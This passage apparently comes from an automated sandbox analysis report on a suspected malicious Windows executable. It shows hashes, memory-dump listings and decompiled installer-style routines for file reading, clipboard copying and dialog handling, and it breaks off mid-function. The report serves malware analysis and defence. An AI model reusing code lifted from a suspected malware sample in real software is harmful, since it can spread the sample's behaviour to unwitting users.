                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Char$Next$CreateDirectoryPrev
                                        • String ID: "C:\Users\user\Desktop\Y4U48592345670954.exe" $C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 4115351271-22103147
                                        • Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                        • Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
                                        • Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                        • Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405690, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E00405690(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                        0x00405694
                                        0x004056a1
                                        0x004056b6
                                        0x004056bc

                                        APIs
                                        • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                        • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
                                        • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                        • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004030CD, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004030CD(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                        0x004030d1
                                        0x004030e4
                                        0x004030ec
                                        0x00000000
                                        0x004030f3
                                        0x00000000
                                        0x004030f5

                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                        • Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
                                        • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                        • Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004030FF, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004030FF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}




                                        0x0040310d
                                        0x00403113

                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                        • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                        • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                        • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 00404EA0, Relevance: 66.8, APIs: 37, Strings: 1, Instructions: 277windowclipboardmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 89%
                                        			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				CHAR* _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t86;
				struct HMENU__* _t88;
				unsigned int _t91;
				int _t93;
				int _t94;
				void* _t100;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t148;
				int _t149;
				struct HWND__* _t153;
				struct HWND__* _t157;
				struct HMENU__* _t159;
				long _t161;
				CHAR* _t162;
				CHAR* _t163;

				_t153 =  *0x7a2764;
				_t148 = 0;
				_v8 = _t153;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
					}
					if(_a8 != 0x111) {
						L16:
						if(_a8 != 0x404) {
							L24:
							if(_a8 != 0x7b || _a12 != _t153) {
								goto L19;
							} else {
								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
								_a8 = _t86;
								if(_t86 <= _t148) {
									L36:
									return 0;
								}
								_t88 = CreatePopupMenu();
								_push(0xffffffe1);
								_push(_t148);
								_t159 = _t88;
								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
								_t91 = _a16;
								if(_t91 != 0xffffffff) {
									_t149 = _t91;
									_t93 = _t91 >> 0x10;
								} else {
									GetWindowRect(_t153,  &_v24);
									_t149 = _v24.left;
									_t93 = _v24.top;
								}
								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
								_t161 = 1;
								if(_t94 == 1) {
									_v56 = _t148;
									_v44 = 0x79f580;
									_v40 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
									} while (_a4 != _t148);
									OpenClipboard(_t148);
									EmptyClipboard();
									_t100 = GlobalAlloc(0x42, _t161);
									_a4 = _t100;
									_t162 = GlobalLock(_t100);
									do {
										_v44 = _t162;
										SendMessageA(_v8, 0x102d, _t148,  &_v64);
										_t163 =  &(_t162[lstrlenA(_t162)]);
										 *_t163 = 0xa0d;
										_t162 =  &(_t163[2]);
										_t148 = _t148 + 1;
									} while (_t148 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L36;
							}
						}
						if( *0x7a274c == _t148) {
							ShowWindow( *0x7a2f84, 8);
							if( *0x7a300c == _t148) {
								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
							}
							E00403D80(1);
							goto L24;
						}
						 *0x79e950 = 2;
						E00403D80(0x78);
						goto L19;
					} else {
						if(_a12 != 0x403) {
							L19:
							return E00403E0E(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a2750, _t148);
						ShowWindow(_t153, 8);
						E0040417A();
						goto L16;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_v56 = 2;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x7a2f88;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x7a2750 = GetDlgItem(_a4, 0x403);
				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x7a2764 = _t127;
				_v8 = _t127;
				E00403DDC( *0x7a2750);
				 *0x7a2754 = E004045FA(4);
				 *0x7a276c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t148) {
					SendMessageA(_v8, 0x1024, _t148, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403DA7(_a4);
				if(( *0x7a2f90 & 0x00000003) != 0) {
					ShowWindow( *0x7a2750, _t148);
					if(( *0x7a2f90 & 0x00000002) != 0) {
						 *0x7a2750 = _t148;
					} else {
						ShowWindow(_v8, 8);
					}
				}
				_t157 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t157, 0x401, _t148, 0x75300000);
				if(( *0x7a2f90 & 0x00000004) != 0) {
					SendMessageA(_t157, 0x409, _t148, _a12);
					SendMessageA(_t157, 0x2001, _t148, _a8);
				}
				goto L36;
			}
































                                        0x00404ea9
                                        0x00404eaf
                                        0x00404eb8
                                        0x00404ebb
                                        0x00405048
                                        0x0040506c
                                        0x0040506c
                                        0x0040507f
                                        0x0040509c
                                        0x004050a3
                                        0x004050fa
                                        0x004050fe
                                        0x00000000
                                        0x00405105
                                        0x0040510d
                                        0x00405115
                                        0x00405118
                                        0x00405215
                                        0x00000000
                                        0x00405215
                                        0x0040511e
                                        0x00405124
                                        0x00405126
                                        0x00405127
                                        0x00405133
                                        0x00405139
                                        0x0040513f
                                        0x00405154
                                        0x0040515a
                                        0x00405141
                                        0x00405146
                                        0x0040514c
                                        0x0040514f
                                        0x0040514f
                                        0x00405168
                                        0x00405170
                                        0x00405173
                                        0x0040517c
                                        0x0040517f
                                        0x00405186
                                        0x0040518d
                                        0x00405195
                                        0x00405195
                                        0x004051ac
                                        0x004051ac
                                        0x004051b3
                                        0x004051b9
                                        0x004051c2
                                        0x004051c9
                                        0x004051d2
                                        0x004051d4
                                        0x004051d7
                                        0x004051e0
                                        0x004051ec
                                        0x004051ee
                                        0x004051f4
                                        0x004051f5
                                        0x004051f6
                                        0x004051fe
                                        0x00405209
                                        0x0040520f
                                        0x0040520f
                                        0x00000000
                                        0x00405173
                                        0x004050fe
                                        0x004050ab
                                        0x004050db
                                        0x004050e3
                                        0x004050ee
                                        0x004050ee
                                        0x004050f5
                                        0x00000000
                                        0x004050f5
                                        0x004050af
                                        0x004050b9
                                        0x00000000
                                        0x00405081
                                        0x00405087
                                        0x004050be
                                        0x00000000
                                        0x004050c7
                                        0x00405090
                                        0x00405095
                                        0x00405097
                                        0x00000000
                                        0x00405097
                                        0x0040507f
                                        0x00404ec1
                                        0x00404ec5
                                        0x00404ece
                                        0x00404ed5
                                        0x00404ed8
                                        0x00404edb
                                        0x00404ede
                                        0x00404edf
                                        0x00404ee0
                                        0x00404ef9
                                        0x00404efc
                                        0x00404f06
                                        0x00404f15
                                        0x00404f1d
                                        0x00404f25
                                        0x00404f2a
                                        0x00404f2d
                                        0x00404f39
                                        0x00404f42
                                        0x00404f4b
                                        0x00404f6e
                                        0x00404f74
                                        0x00404f85
                                        0x00404f8a
                                        0x00404f98
                                        0x00404fa6
                                        0x00404fa6
                                        0x00404fab
                                        0x00404fb9
                                        0x00404fb9
                                        0x00404fbe
                                        0x00404fc1
                                        0x00404fc6
                                        0x00404fd2
                                        0x00404fdb
                                        0x00404fe8
                                        0x00404ff7
                                        0x00404fea
                                        0x00404fef
                                        0x00404fef
                                        0x00404fe8
                                        0x0040500c
                                        0x00405015
                                        0x0040501e
                                        0x0040502e
                                        0x0040503a
                                        0x0040503a
                                        0x00000000

                                        APIs
                                        • GetDlgItem.USER32 ref: 00404EFF
                                        • GetDlgItem.USER32 ref: 00404F0E
                                        • GetDlgItem.USER32 ref: 00404F1D
                                          • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
                                        • GetClientRect.USER32 ref: 00404F4B
                                        • GetSystemMetrics.USER32 ref: 00404F53
                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
                                        • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
                                        • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
                                        • ShowWindow.USER32(?,00000008), ref: 00404FEF
                                        • GetDlgItem.USER32 ref: 00405005
                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
                                        • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
                                        • GetDlgItem.USER32 ref: 00405057
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00004E34,00000000), ref: 00405065
                                        • CloseHandle.KERNEL32(00000000), ref: 0040506C
                                        • ShowWindow.USER32(00000000), ref: 00405090
                                        • ShowWindow.USER32(?,00000008), ref: 00405095
                                        • ShowWindow.USER32(00000008), ref: 004050DB
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
                                        • CreatePopupMenu.USER32 ref: 0040511E
                                        • AppendMenuA.USER32 ref: 00405133
                                        • GetWindowRect.USER32 ref: 00405146
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
                                        • OpenClipboard.USER32(00000000), ref: 004051B3
                                        • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
                                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
                                        • GlobalLock.KERNEL32 ref: 004051CC
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
                                        • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
                                        • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
                                        • SetClipboardData.USER32 ref: 00405209
                                        • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040520F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
                                        • String ID: {
                                        • API String ID: 1050754034-366298937
                                        • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                        • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
                                        • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                        • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004046A7, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 477windowmemoryCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				struct HBITMAP__* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x7a2fa8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x7a2f88 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x7a2f91 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404627(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x79f564;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x79f578;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x79f564 = _t315;
								 *0x79f578 = _t315;
								 *0x7a2fe0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E00401410(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x79f578;
									_t196 =  *0x7a2fa8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x7a2fac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x7a2fac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x79f578);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x7a2fe0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x79f564 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403DA7(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x7a2fac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
